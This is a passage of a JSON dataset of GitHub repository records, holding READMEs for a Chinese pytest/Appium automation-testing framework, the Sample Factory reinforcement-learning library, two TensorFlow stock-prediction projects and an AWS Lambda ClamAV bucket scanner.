generateReport_app_ui_test_report.py -sp 9084\n* \u8bbf\u95ee\u5730\u5740http://ip:9084\n\n### \u6ce8\uff1a\u5728\u4f7f\u7528Ubuntu\u8fdb\u884c\u62a5\u544a\u751f\u6210\u65f6\uff0c\u8bf7\u52ff\u4f7f\u7528sudo\u6743\u9650\uff0c\u5426\u5219\u65e0\u6cd5\u751f\u6210\uff0callure\u4e0d\u652f\u6301\n\n## \u4e94\u3001\u9879\u76ee\u8bf4\u660e\n### 1\u3001API\u6d4b\u8bd5\n* \u9879\u76ee\n * demoProject \u4f8b\u5b50\u9879\u76ee\n \n### 2\u3001web ui\u6d4b\u8bd5\n* \u5143\u7d20\u7684\u663e\u5f0f\u7b49\u5f85\u65f6\u95f4\u9ed8\u8ba4\u4e3a30s\n* \u5c01\u88c5\u7684\u663e\u5f0f\u7b49\u5f85\u7c7b\u578b\u652f\u6301:page_objects/web_ui/wait_type.py\n* \u5c01\u88c5\u7684\u5b9a\u4f4d\u7c7b\u578b\u652f\u6301:page_objects/web_ui/locator_type.py\n* \u9ed8\u8ba4\u4f7f\u75284\u4e2aworker\u8fdb\u884c\u5e76\u884c\u6d4b\u8bd5\n* \u6587\u4ef6\u4e0b\u8f7d\u5904\u7406\u6682\u4e0d\u652f\u6301ie\u6d4f\u89c8\u5668\n* \u65e0\u5934\u6d4f\u89c8\u5668\u6682\u4e0d\u652f\u6301ie\u6d4f\u89c8\u5668\n* \u9879\u76ee\n * demoProject \u4f8b\u5b50\u9879\u76ee\n \n### 3\u3001app ui\u6d4b\u8bd5\n* \u5143\u7d20\u7684\u663e\u5f0f\u7b49\u5f85\u65f6\u95f4\u9ed8\u8ba4\u4e3a30s\n* \u5c01\u88c5\u7684\u663e\u5f0f\u7b49\u5f85\u7c7b\u578b\u652f\u6301:page_objects/app_ui/wait_type.py\n* \u5c01\u88c5\u7684\u5b9a\u4f4d\u7c7b\u578b\u652f\u6301:page_objects/app_ui/locator_type.py\n* \u9879\u76ee\n * android \n * demoProject \u4f8b\u5b50\u9879\u76ee\n\n# [\u9879\u76ee\u7ed3\u6784]()\n* base \u57fa\u7840\u8bf7\u6c42\u7c7b\n* cases \u6d4b\u8bd5\u7528\u4f8b\u76ee\u5f55\n* common \u516c\u5171\u6a21\u5757\n* common_projects \u6bcf\u4e2a\u9879\u76ee\u7684\u516c\u5171\u6a21\u5757\n* config\u3000\u914d\u7f6e\u6587\u4ef6\n* init \u521d\u59cb\u5316\n* logs \u65e5\u5fd7\u76ee\u5f55\n* output \u6d4b\u8bd5\u7ed3\u679c\u8f93\u51fa\u76ee\u5f55 \n* packages app ui\u6d4b\u8bd5\u7684\u5b89\u88c5\u5305\n* page_objects \u9875\u9762\u6620\u5c04\u5bf9\u8c61\n* pojo \u5b58\u653e\u81ea\u5b9a\u4e49\u7c7b\u5bf9\u8c61\n* test_data \u6d4b\u8bd5\u6240\u9700\u7684\u6d4b\u8bd5\u6570\u636e\u76ee\u5f55\n* run_api_test.py \u8fd0\u884capi\u6d4b\u8bd5\u811a\u672c\n* run_web_ui_test.py \u8fd0\u884cweb ui\u6d4b\u8bd5\u811a\u672c\n* run_app_ui_test.py \u8fd0\u884capp ui\u6d4b\u8bd5\u811a\u672c\n* generate_api_test_report.py \u751f\u6210api\u6d4b\u8bd5\u62a5\u544a\n* generateReport_web_ui_test_report.py \u751f\u6210web ui\u6d4b\u8bd5\u62a5\u544a\n* generateReport_app_ui_test_report.py \u751f\u6210app ui\u6d4b\u8bd5\u62a5\u544a\n* start_locust_master.sh \u542f\u52a8locust\u4e3b\u8282\u70b9\n* start_locust_slave.sh \u542f\u52a8locust\u4ece\u8282\u70b9\n\n# [\u7f16\u7801\u89c4\u8303]()\n* \u7edf\u4e00\u4f7f\u7528python 3.6.8\n* \u7f16\u7801\u4f7f\u7528-\\*- coding:utf8 -\\*-,\u4e14\u4e0d\u6307\u5b9a\u89e3\u91ca\u5668\n* \u7c7b/\u65b9\u6cd5\u7684\u6ce8\u91ca\u5747\u5199\u5728class/def\u4e0b\u4e00\u884c\uff0c\u5e76\u4e14\u7528\u4e09\u4e2a\u53cc\u5f15\u53f7\u5f62\u5f0f\u6ce8\u91ca\n* \u5c40\u90e8\u4ee3\u7801\u6ce8\u91ca\u4f7f\u7528#\u53f7\n* \u6240\u6709\u4e2d\u6587\u90fd\u76f4\u63a5\u4f7f\u7528\u5b57\u7b26\u4e32\uff0c\u4e0d\u8f6c\u6362\u6210Unicode\uff0c\u5373\u4e0d\u662f\u7528\u3010u'\u4e2d\u6587'\u3011\u7f16\u5199\n* \u6240\u6709\u7684\u6d4b\u8bd5\u6a21\u5757\u6587\u4ef6\u90fd\u4ee5test_projectName_moduleName.py\u547d\u540d\n* \u6240\u6709\u7684\u6d4b\u8bd5\u7c7b\u90fd\u4ee5Test\u5f00\u5934\uff0c\u7c7b\u4e2d\u65b9\u6cd5(\u7528\u4f8b)\u90fd\u4ee5test_\u5f00\u5934\n* \u6bcf\u4e2a\u6d4b\u8bd5\u9879\u76ee\u90fd\u5728cases\u76ee\u5f55\u91cc\u521b\u5efa\u4e00\u4e2a\u76ee\u5f55\uff0c\u4e14\u76ee\u5f55\u90fd\u5305\u542b\u6709api\u3001scenrarios\u4e24\u4e2a\u76ee\u5f55\n* case\u5bf9\u5e94setup/teardown\u7684fixture\u7edf\u4e00\u547d\u540d\u6210fixture_[test_case_method_name]\n* \u6bcf\u4e00\u4e2a\u6a21\u5757\u4e2d\u6d4b\u8bd5\u7528\u4f8b\u5982\u679c\u6709\u987a\u5e8f\u8981\u6c42\u3010\u4e3b\u8981\u9488\u5bf9ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u3011\uff0c\u5219\u81ea\u4e0a\u800c\u4e0b\u6392\u5e8f\uff0cpytest\u5728\u5355\u4e2a\u6a21\u5757\u91cc\u4f1a\u81ea\u4e0a\u800c\u4e0b\u6309\u987a\u5e8f\u6267\u884c\n\n# [pytest\u5e38\u7528]()\n* @pytest.mark.skip(reason='\u8be5\u529f\u80fd\u5df2\u5e9f\u5f03')\n* @pytest.mark.parametrize('key1,key2',[(key1_value1,key2_value2),(key1_value2,key2_value2)])\n* @pytest.mark.usefixtures('func_name')\n\n# [\u6ce8\u610f\u70b9]()\n* \u8fd0\u884cpytest\u65f6\u6307\u5b9a\u7684\u76ee\u5f55\u5185\u5e94\u5f53\u6709conftest.py\uff0c\u65b9\u80fd\u5728\u5176\u4ed6\u6a21\u5757\u4e2d\u4f7f\u7528\u3002@allure.step\u4f1a\u5f71\u54cdfixture\uff0c\u6545\u5728\u811a\u672c\u4e2d\u4e0d\u4f7f\u7528@allure.step\n* \u7531\u4e8eweb ui\u914d\u7f6e\u7684\u9a71\u52a8\u662f\u76f4\u63a5\u8bbe\u7f6e\u5728\u7cfb\u7edf\u73af\u5883\u53d8\u91cf\uff0capp ui\u6307\u5b9a\u4e86\u6df7\u5408\u5e94\u7528\u7684\u6d4f\u89c8\u5668\u9a71\u52a8\uff0c\u5728\u8fd0\u884capp ui\u65f6appium\u6709\u53ef\u80fd\u4f1a\u8bfb\u53d6\u5230\u7cfb\u7edf\u7684\u73af\u5883\u53d8\u91cf\u7684\u914d\u7f6e\uff0c\u6545\u8fd0\u884c\u65f6\u8bf7\u6392\u67e5\u6b64\u60c5\u51b5\n* \u6570\u636e\u5e93\u64cd\u4f5c\uff0c\u6240\u6709\u8868\u64cd\u4f5c\u5747\u8fdb\u884c\u5355\u8868\u64cd\u4f5c\uff0c\u5982\u9700\u591a\u8868\u67e5\u8be2\uff0c\u4f7f\u7528\u4ee3\u7801\u8fdb\u884c\u805a\u5408\n* web ui\u6d4b\u8bd5\n * \u7edf\u4e00\u4f7f\u7528Firefox\u6d4f\u89c8\u5668\u8fdb\u884c\u5143\u7d20\u5b9a\u4f4d\n * \u80fd\u7528id\u3001name\u3001link(\u4e0d\u5e38\u53d8\u5316\u7684\u94fe\u63a5)\u5b9a\u4f4d\u7684\uff0c\u4e0d\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u80fd\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u4e0d\u4f7f\u7528xpath\u5b9a\u4f4d\n * \u9879\u76ee\u4f7f\u7528\u5e76\u53d1\u8fd0\u884c\uff0c\u6545\u7f16\u5199\u6d4b\u8bd5\u7528\u4f8b\u65f6\uff0c\u5e94\u8be5\u907f\u514d\u6a21\u5757\u4e0e\u6a21\u5757\u76f4\u63a5\u7684\u7528\u4f8b\u4f1a\u76f8\u4e92\u5f71\u54cd\u6d4b\u8bd5\u7ed3\u679c\n* app ui\u6d4b\u8bd5\n * \u80fd\u7528id\u3001name\u3001link(\u4e0d\u5e38\u53d8\u5316\u7684\u94fe\u63a5)\u5b9a\u4f4d\u7684\uff0c\u4e0d\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u80fd\u4f7f\u7528css\u5b9a\u4f4d\uff0c\u4e0d\u4f7f\u7528xpath\u5b9a\u4f4d\n * \u5982\u9700\u8981\u4e0a\u4f20\u6587\u4ef6\u5230\u624b\u673a\u6216\u8005\u4ece\u624b\u673a\u4e0b\u8f7d\u6587\u4ef6\uff0c\u8bf7\u786e\u4fdd\u6709\u624b\u673a\u5bf9\u5e94\u76ee\u5f55\u7684\u8bfb\u5199\u6743\u9650\n * \u89c6\u9891\u5f55\u5236\u7edf\u4e00\u5bf9\u5355\u4e2a\u5355\u4e2acase\u8fdb\u884c\uff0c\u4fdd\u8bc1\u5f55\u5236\u65f6\u95f4\u4e0d\u8d85\u8fc73\u5206\u949f\uff0c\u4e14\u5f55\u5236\u6587\u4ef6\u4e0d\u8981\u8fc7\u5927\uff0c\u5426\u5219\u4f1a\u5f15\u8d77\u624b\u673a\u5185\u5b58\u65e0\u6cd5\u5b58\u50a8\u89c6\u9891\n * \u786e\u8ba4\u624b\u673a\u662f\u5426\u80fd\u8fdb\u884c\u89c6\u9891\u5f55\u5236\u6267\u884c\u547d\u4ee4adb shell screenrecord /sdcard/test.mp4\uff0c\u80fd\u6b63\u5e38\u6267\u884c\u5373\u53ef\n * \u8bbe\u5907\u5c4f\u5e55\u5750\u6807\u7cfb\u539f\u70b9\u90fd\u5728\u6700\u5de6\u4e0a\u89d2\uff0c\u5f80\u53f3x\u8f74\u9012\u589e\uff0c\u5f80\u4e0by\u8f74\u9012\u589e\n\n# [\u8fdb\u4ea4\u6d41\u7fa4]()\n![avatar](https://github.com/yanchunhuo/resources/blob/master/wechat.png)\n\n\n[![Stargazers over time](https://starchart.cc/yanchunhuo/AutomationTest.svg)](https://starchart.cc/yanchunhuo/AutomationTest)\n\n[![Top Langs](https://profile-counter.glitch.me/yanchunhuo/count.svg)](https://github.com/yanchunhuo)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alex-petrenko/sample-factory", "link": "https://github.com/alex-petrenko/sample-factory", "tags": ["reinforcement-learning"], "stars": 515, "description": "High throughput synchronous and asynchronous reinforcement learning", "lang": "Python", "repo_lang": "", "readme": "[![tests](https://github.com/alex-petrenko/sample-factory/actions/workflows/test-ci.yml/badge.svg?branch=master)](https://github.com/alex-petrenko/sample-factory/actions/workflows/test-ci.yml)\n[![codecov](https://codecov.io/gh/alex-petrenko/sample-factory/branch/master/graph/badge.svg?token=9EHMIU5WYV)](https://codecov.io/gh/alex-petrenko/sample-factory)\n[![pre-commit](https://github.com/alex-petrenko/sample-factory/actions/workflows/pre-commit.yml/badge.svg?branch=master)](https://github.com/alex-petrenko/sample-factory/actions/workflows/pre-commit.yml)\n[![docs](https://github.com/alex-petrenko/sample-factory/actions/workflows/docs.yml/badge.svg)](https://samplefactory.dev)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![Imports: isort](https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336)](https://pycqa.github.io/isort/)\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/alex-petrenko/sample-factory/blob/master/LICENSE)\n[![Downloads](https://pepy.tech/badge/sample-factory)](https://pepy.tech/project/sample-factory)\n[](https://discord.gg/BCfHWaSMkr)\n\n\n\n\n# Sample Factory\n\nHigh-throughput reinforcement learning codebase. Version 2.0.0 is out! \ud83e\udd17\n\n**Resources:**\n\n* **Documentation:** [https://samplefactory.dev](https://samplefactory.dev) \n\n* **Paper:** https://arxiv.org/abs/2006.11751\n\n* **Citation:** [BibTeX](https://github.com/alex-petrenko/sample-factory#citation)\n\n* **Discord:** [https://discord.gg/BCfHWaSMkr](https://discord.gg/BCfHWaSMkr)\n\n* **Twitter (for updates):** [@petrenko_ai](https://twitter.com/petrenko_ai)\n\n* **Talk (circa 2021):** https://youtu.be/lLG17LKKSZc\n\n### What is Sample Factory?\n\nSample Factory is one of the fastest RL libraries.\nWe focused on very efficient synchronous and asynchronous implementations of policy gradients (PPO). \n\nSample Factory is thoroughly tested, used by many researchers and practitioners, and is actively maintained.\nOur implementation is known to reach SOTA performance in a variety of domains in a short amount of time.\nClips below demonstrate ViZDoom, IsaacGym, DMLab-30, Megaverse, Mujoco, and Atari agents trained with Sample Factory:\n\n

\n\"VizDoom\n\"IsaacGym\n
\n\"DMLab-30\n\"Megaverse\n
\n\"Mujoco\n\"Atari\n

\n\n**Key features:**\n\n* Highly optimized algorithm [architecture](https://www.samplefactory.dev/06-architecture/overview/) for maximum learning throughput\n* [Synchronous and asynchronous](https://www.samplefactory.dev/07-advanced-topics/sync-async/) training regimes\n* [Serial (single-process) mode](https://www.samplefactory.dev/07-advanced-topics/serial-mode/) for easy debugging\n* Optimal performance in both CPU-based and [GPU-accelerated environments](https://www.samplefactory.dev/09-environment-integrations/isaacgym/)\n* Single- & multi-agent training, self-play, supports [training multiple policies](https://www.samplefactory.dev/07-advanced-topics/multi-policy-training/) at once on one or many GPUs\n* Population-Based Training ([PBT](https://www.samplefactory.dev/07-advanced-topics/multi-policy-training/))\n* Discrete, continuous, hybrid action spaces\n* Vector-based, image-based, dictionary observation spaces\n* Automatically creates a model architecture by parsing action/observation space specification. Supports [custom model architectures](https://www.samplefactory.dev/03-customization/custom-models/)\n* Library is designed to be imported into other projects, [custom environments](https://www.samplefactory.dev/03-customization/custom-environments/) are first-class citizens\n* Detailed [WandB and Tensorboard summaries](https://www.samplefactory.dev/05-monitoring/metrics-reference/), [custom metrics](https://www.samplefactory.dev/05-monitoring/custom-metrics/)\n* [HuggingFace \ud83e\udd17 integration](https://www.samplefactory.dev/10-huggingface/huggingface/) (upload trained models and metrics to the Hub)\n* [Multiple](https://www.samplefactory.dev/09-environment-integrations/mujoco/) [example](https://www.samplefactory.dev/09-environment-integrations/atari/) [environment](https://www.samplefactory.dev/09-environment-integrations/vizdoom/) [integrations](https://www.samplefactory.dev/09-environment-integrations/dmlab/) with tuned parameters and trained models\n\nThis Readme provides only a brief overview of the library.\nVisit full documentation at [https://samplefactory.dev](https://samplefactory.dev) for more details.\n\n## Installation\n\nJust install from PyPI:\n\n```pip install sample-factory```\n\nSF is known to work on Linux and macOS. There is no Windows support at this time.\nPlease refer to the [documentation](https://samplefactory.dev) for additional environment-specific installation notes.\n\n## Quickstart\n\nUse command line to train an agent using one of the existing integrations, e.g. Mujoco (might need to run `pip install sample-factory[mujoco]`):\n\n```bash\npython -m sf_examples.mujoco.train_mujoco --env=mujoco_ant --experiment=Ant --train_dir=./train_dir\n```\n\nStop the experiment (Ctrl+C) when the desired performance is reached and then evaluate the agent:\n\n```bash\npython -m sf_examples.mujoco.enjoy_mujoco --env=mujoco_ant --experiment=Ant --train_dir=./train_dir\n```\n\nDo the same in a pixel-based VizDoom environment (might need to run `pip install sample-factory[vizdoom]`, please also see docs for VizDoom-specific instructions):\n\n```bash\npython -m sf_examples.vizdoom.train_vizdoom --env=doom_basic --experiment=DoomBasic --train_dir=./train_dir --num_workers=16 --num_envs_per_worker=10 --train_for_env_steps=1000000\npython -m sf_examples.vizdoom.enjoy_vizdoom --env=doom_basic --experiment=DoomBasic --train_dir=./train_dir\n```\n\nMonitor any running or completed experiment with Tensorboard:\n\n```bash\ntensorboard --logdir=./train_dir\n```\n(or see the docs for WandB integration).\n\nTo continue from here, copy and modify one of the existing env integrations to train agents in your own custom environment. We provide\nexamples for all kinds of supported environments, please refer to the [documentation](https://samplefactory.dev) for more details.\n\n## Acknowledgements\n\nThis project would not be possible without amazing contributions from many people. I would like to thank:\n\n* [Vladlen Koltun](https://vladlen.info) for amazing guidance and support, especially in the early stages of the project, for\nhelping me solidify the ideas that eventually became this library.\n* My academic advisor [Gaurav Sukhatme](https://viterbi.usc.edu/directory/faculty/Sukhatme/Gaurav) for supporting this project\nover the years of my PhD and for being overall an awesome mentor.\n* [Zhehui Huang](https://zhehui-huang.github.io/) for his contributions to the original ICML submission, his diligent work on\ntesting and evaluating the library and for adopting it in his own research.\n* [Edward Beeching](https://edbeeching.github.io/) for his numerous awesome contributions to the codebase, including\nhybrid action distributions, new version of the custom model builder, multiple environment integrations, and also\nfor promoting the library through the HuggingFace integration!\n* [Andrew Zhang](https://andrewzhang505.github.io/) and [Ming Wang](https://www.mingwang.me/) for numerous contributions to the codebase and documentation during their HuggingFace internships!\n* [Thomas Wolf](https://thomwolf.io/) and others at HuggingFace for the incredible (and unexpected) support and for the amazing\nwork they are doing for the open-source community.\n* [Erik Wijmans](https://wijmans.xyz/) for feedback and insights and for his awesome implementation of RNN backprop using PyTorch's `PackedSequence`, multi-layer RNNs, and other features!\n* [Tushar Kumar](https://www.linkedin.com/in/tushartk/) for contributing to the original paper and for his help\nwith the [fast queue implementation](https://github.com/alex-petrenko/faster-fifo).\n* [Costa Huang](https://costa.sh/) for developing CleanRL, for his work on benchmarking RL algorithms, and for awesome feedback\nand insights!\n* [Denys Makoviichuk](https://github.com/Denys88/rl_games) for developing rl_games, a very fast RL library, for inspiration and \nfeedback on numerous features of this library (such as return normalizations, adaptive learning rate, and others).\n* [Eugene Vinitsky](https://eugenevinitsky.github.io/) for adopting this library in his own research and for his valuable feedback.\n* All my labmates at RESL who used Sample Factory in their projects and provided feedback and insights!\n\nHuge thanks to all the people who are not mentioned here for your code contributions, PRs, issues, and questions!\nThis project would not be possible without a community!\n\n## Citation\n\nIf you use this repository in your work or otherwise wish to cite it, please make reference to our ICML2020 paper.\n\n```\n@inproceedings{petrenko2020sf,\n author = {Aleksei Petrenko and\n Zhehui Huang and\n Tushar Kumar and\n Gaurav S. Sukhatme and\n Vladlen Koltun},\n title = {Sample Factory: Egocentric 3D Control from Pixels at 100000 {FPS}\n with Asynchronous Reinforcement Learning},\n booktitle = {Proceedings of the 37th International Conference on Machine Learning,\n {ICML} 2020, 13-18 July 2020, Virtual Event},\n series = {Proceedings of Machine Learning Research},\n volume = {119},\n pages = {7652--7662},\n publisher = {{PMLR}},\n year = {2020},\n url = {http://proceedings.mlr.press/v119/petrenko20a.html},\n biburl = {https://dblp.org/rec/conf/icml/PetrenkoHKSK20.bib},\n bibsource = {dblp computer science bibliography, https://dblp.org}\n}\n```\n\nFor questions, issues, inquiries please join Discord. \nGithub issues and pull requests are welcome! Check out the [contribution guidelines](https://www.samplefactory.dev/community/contribution/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sebastianheinz/stockprediction", "link": "https://github.com/sebastianheinz/stockprediction", "tags": [], "stars": 513, "description": "Data and code of my Medium story on stock prediction with TensorFlow", "lang": "Python", "repo_lang": "", "readme": "# A simple deep learning model for stock prediction using TensorFlow\n\nThis repository contains the Python script as well as the source dataset from my Medium.com article [\"A simple deep learning model for stock prediction using TensoFlow\"](https://medium.com/mlreview/a-simple-deep-learning-model-for-stock-price-prediction-using-tensorflow-30505541d877).\n\nPlease note, that the dataset is zipped due to Github file size restrictions. Feel free to clone and fork! :)\n\nIf you need any help in developing deep learning models in Python and TensorFlow contact my [\"data science consulting company STATWORX\"](https://www.statworx.com/de/data-science/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "philipxjm/Deep-Convolution-Stock-Technical-Analysis", "link": "https://github.com/philipxjm/Deep-Convolution-Stock-Technical-Analysis", "tags": ["stock-price-prediction", "convolutional-neural-networks", "neural-network", "technical-analysis", "stock-market"], "stars": 513, "description": "Uses Deep Convolutional Neural Networks (CNNs) to model the stock market using technical analysis. Predicts the future trend of stock selections.", "lang": "Python", "repo_lang": "", "readme": "# Neural Stock Market Prediction\nUses Deep Convolutional Neural Networks (CNNs) to model the stock market using technical analysis. Predicts the future trend of stock selections.\n\n## How does it work?\nConvolutional neural networks are designed to recognize complex patterns and features in images. It works by dividing an image up into multiple overlapping perceptive fields and running a myriad of trainable filters through them, capturing basic features and patterns. This process is repeated several times, and as the filtered image is ran through more filters, deeper and more meaningful features are extracted and quantified. For example, to recognize an image of a car we might have several filters that are sensitive to wheels, or windows, or exhaust pipes, or licence plates... and all of the results of these filters are gathered and quantified into a final classifier.\n\n\"CNN\"\n\nOK, that's great, but how does this tie in to stock analysis? Here we introduce the study of technical analysis. I'll let Investopedia's words describe it: \"Technical analysis is a trading tool employed to evaluate securities and attempt to forecast their future movement by analyzing statistics gathered from trading activity, such as price movement and volume. Unlike fundamental analysts who attempt to evaluate a security's intrinsic value, technical analysts focus on charts of price movement and various analytical tools to evaluate a security's strength or weakness and forecast future price changes.\" In other words, technical analysis focuses on the movement patterns and trading behaviors of stock selections to pinpoint a stock's future trend. Wait a minute, if technical analysis works by analysing the movement patterns of stocks, we can use CNN to model this analytical technique!\n\nFor example, we would have some filters that are sensitive to shortterm uptrends, and they will be combined by fully connected layers to be sensitive to longterm uptrends. The same goes for some complex patterns such as shortterm floats, or an overall downward trend capture.\n\nAs previously mentioned, CNN works by stacking several filters on top of each other to form complex feature-sensitive filters; if we were to treat stock data as images, we can apply CNN to it and extract useful and deep information. How do we go about this?\n\nInstead of convolving a 2D image, we convolved a 1D image, since stock data is linear and is represented as an 1D tensor.\n\n```python\ndef conv1d(input, output_dim,\n conv_w=9, conv_s=2,\n padding=\"SAME\", name=\"conv1d\",\n stddev=0.02, bias=False):\n with tf.variable_scope(name):\n w = tf.get_variable('w', [conv_w, input.get_shape().as_list()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n c = tf.nn.conv1d(input, w, conv_s, padding=padding)\n\n if bias:\n b = tf.get_variable('b', [output_dim], initializer=tf.constant_initializer(0.0))\n return c + b\n\n return c\n```\n\nAlso, the input images is in the shape ```[batch_size, 128, 5]```, the moving-window (the length of data we will be looking at in one batch) the five channels being ```[Open, High, Low, Close, Volume]```, all information I deemed important for technical analysis.\n\nAfter several convolutional layers and batchnorms later, we arrive at a tensor sized ```[batch_size, 2, 1024]```, which we then run through several softmax layers and finally a sigmoid activation to result in a tensor sized ```[batch_size, 2]```, with two values, one representing the bullish confidence, and the other one the bearish confidence.\n\n## Materials for Consideration\n|Name|Link|\n|---|---|\n|Historical Data||\n|Description of Technical Analysis||\n|Berkeley paper on ANN-based analysis||\n\n## Data Format\n\n`19991118,0,42.2076,46.382,37.4581,39.1928,43981812.87`\n\n|Date|Time|Open|High|Low|Close|Volume|\n|---|---|---|---|---|---|---|\n|19991118|0|42.2076|46.382|37.4581|39.1928|43981812.87|\n\n## Usage\n\nThe trained model is proprietary, but you are absolutely welcome to train your own using my code.\n\nYou must have python 3.5+ and tensorflow installed, tensorflow-gpu highly recommended as the training requires a lot of computational power.\n\n```pip install tensorflow-gpu```\n\n```git clone https://github.com/philipxjm/Convolutional-Neural-Stock-Market-Technical-Analyser.git```\n\n```cd Convolutional-Neural-Stock-Market-Technical-Analyser```\n\n```python stock_model.py```\n\nOf course, you have to tinker with the hyper parameters, archeteture of the encoder, and the dataset setup if you want to achieve good results. Good luck and make some money.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bluesentry/bucket-antivirus-function", "link": "https://github.com/bluesentry/bucket-antivirus-function", "tags": [], "stars": 513, "description": "Serverless antivirus for cloud storage.", "lang": "Python", "repo_lang": "", "readme": "# bucket-antivirus-function\n\n[![CircleCI](https://circleci.com/gh/upsidetravel/bucket-antivirus-function.svg?style=svg)](https://circleci.com/gh/upsidetravel/bucket-antivirus-function)\n\nScan new objects added to any s3 bucket using AWS Lambda. [more details in this post](https://engineering.upside.com/s3-antivirus-scanning-with-lambda-and-clamav-7d33f9c5092e)\n\n## Features\n\n- Easy to install\n- Send events from an unlimited number of S3 buckets\n- Prevent reading of infected files using S3 bucket policies\n- Accesses the end-user\u2019s separate installation of\nopen source antivirus engine [ClamAV](http://www.clamav.net/)\n\n## How It Works\n\n![architecture-diagram](../master/images/bucket-antivirus-function.png)\n\n- Each time a new object is added to a bucket, S3 invokes the Lambda\nfunction to scan the object\n- The function package will download (if needed) current antivirus\ndefinitions from a S3 bucket. Transfer speeds between a S3 bucket and\nLambda are typically faster and more reliable than another source\n- The object is scanned for viruses and malware. Archive files are\nextracted and the files inside scanned also\n- The objects tags are updated to reflect the result of the scan, CLEAN\nor INFECTED, along with the date and time of the scan.\n- Object metadata is updated to reflect the result of the scan (optional)\n- Metrics are sent to [DataDog](https://www.datadoghq.com/) (optional)\n- Scan results are published to a SNS topic (optional) (Optionally choose to only publish INFECTED results)\n- Files found to be INFECTED are automatically deleted (optional)\n\n## Installation\n\n### Build from Source\n\nTo build the archive to upload to AWS Lambda, run `make all`. The build process is completed using\nthe [amazonlinux](https://hub.docker.com/_/amazonlinux/) [Docker](https://www.docker.com)\n image. The resulting archive will be built at `build/lambda.zip`. This file will be\n uploaded to AWS for both Lambda functions below.\n\n### Create Relevant AWS Infra via CloudFormation\n\nUse CloudFormation with the `cloudformation.yaml` located in the `deploy/` directory to quickly spin up the AWS infra needed to run this project. CloudFormation will create:\n\n- An S3 bucket that will store AntiVirus definitions.\n- A Lambda Function called `avUpdateDefinitions` that will update the AV Definitions in the S3 Bucket every 3 hours.\nThis function accesses the user\u2019s above S3 Bucket to download updated definitions using `freshclam`.\n- A Lambda Function called `avScanner` that is triggered on each new S3 object creation which scans the object and tags it appropriately. It is created with `1600mb` of memory which should be enough, however if you start to see function timeouts, this memory may have to be bumped up. In the past, we recommended using `1024mb`, but that has started causing Lambda timeouts and bumping this memory has resolved it.\n\nRunning CloudFormation, it will ask for 2 inputs for this stack:\n\n1. BucketType: `private` (default) or `public`. This is applied to the S3 bucket that stores the AntiVirus definitions. We recommend to only use `public` when other AWS accounts need access to this bucket.\n2. SourceBucket: [a non-empty string]. The name (do not include `s3://`) of the S3 bucket that will have its objects scanned. _Note - this is just used to create the IAM Policy, you can add/change source buckets later via the IAM Policy that CloudFormation outputs_\n\nAfter the Stack has successfully created, there are 3 manual processes that still have to be done:\n\n1. Upload the `build/lambda.zip` file that was created by running `make all` to the `avUpdateDefinitions` and `avScanner` Lambda functions via the Lambda Console.\n2. To trigger the Scanner function on new S3 objects, go to the `avScanner` Lambda function console, navigate to `Configuration` -> `Trigger` -> `Add Trigger` -> Search for S3, and choose your bucket(s) and select `All object create events`, then click `Add`. _Note - if you chose more than 1 bucket as the source, or chose a different bucket than the Source Bucket in the CloudFormation parameter, you will have to also edit the IAM Role to reflect these new buckets (see \"Adding or Changing Source Buckets\")_\n3. Navigate to the `avUpdateDefinitions` Lambda function and manually trigger the function to get the initial Clam definitions in the bucket (instead of waiting for the 3 hour trigger to happen). Do this by clicking the `Test` section, and then clicking the orange `test` button. The function should take a few seconds to execute, and when finished you should see the `clam_defs` in the `av-definitions` S3 bucket.\n\n#### Adding or Changing Source Buckets\n\nChanging or adding Source Buckets is done by editing the `AVScannerLambdaRole` IAM Role. More specifically, the `S3AVScan` and `KmsDecrypt` parts of that IAM Role's policy.\n\n### S3 Events\n\nConfigure scanning of additional buckets by adding a new S3 event to\ninvoke the Lambda function. This is done from the properties of any\nbucket in the AWS console.\n\n![s3-event](../master/images/s3-event.png)\n\nNote: If configured to update object metadata, events must only be\nconfigured for `PUT` and `POST`. Metadata is immutable, which requires\nthe function to copy the object over itself with updated metadata. This\ncan cause a continuous loop of scanning if improperly configured.\n\n## Configuration\n\nRuntime configuration is accomplished using environment variables. See\nthe table below for reference.\n\n| Variable | Description | Default | Required |\n| --- | --- | --- | --- |\n| AV_DEFINITION_S3_BUCKET | Bucket containing antivirus definition files | | Yes |\n| AV_DEFINITION_S3_PREFIX | Prefix for antivirus definition files | clamav_defs | No |\n| AV_DEFINITION_PATH | Path containing files at runtime | /tmp/clamav_defs | No |\n| AV_SCAN_START_SNS_ARN | SNS topic ARN to publish notification about start of scan | | No |\n| AV_SCAN_START_METADATA | The tag/metadata indicating the start of the scan | av-scan-start | No |\n| AV_SIGNATURE_METADATA | The tag/metadata name representing file's AV type | av-signature | No |\n| AV_STATUS_CLEAN | The value assigned to clean items inside of tags/metadata | CLEAN | No |\n| AV_STATUS_INFECTED | The value assigned to clean items inside of tags/metadata | INFECTED | No |\n| AV_STATUS_METADATA | The tag/metadata name representing file's AV status | av-status | No |\n| AV_STATUS_SNS_ARN | SNS topic ARN to publish scan results (optional) | | No |\n| AV_STATUS_SNS_PUBLISH_CLEAN | Publish AV_STATUS_CLEAN results to AV_STATUS_SNS_ARN | True | No |\n| AV_STATUS_SNS_PUBLISH_INFECTED | Publish AV_STATUS_INFECTED results to AV_STATUS_SNS_ARN | True | No |\n| AV_TIMESTAMP_METADATA | The tag/metadata name representing file's scan time | av-timestamp | No |\n| CLAMAVLIB_PATH | Path to ClamAV library files | ./bin | No |\n| CLAMSCAN_PATH | Path to ClamAV clamscan binary | ./bin/clamscan | No |\n| 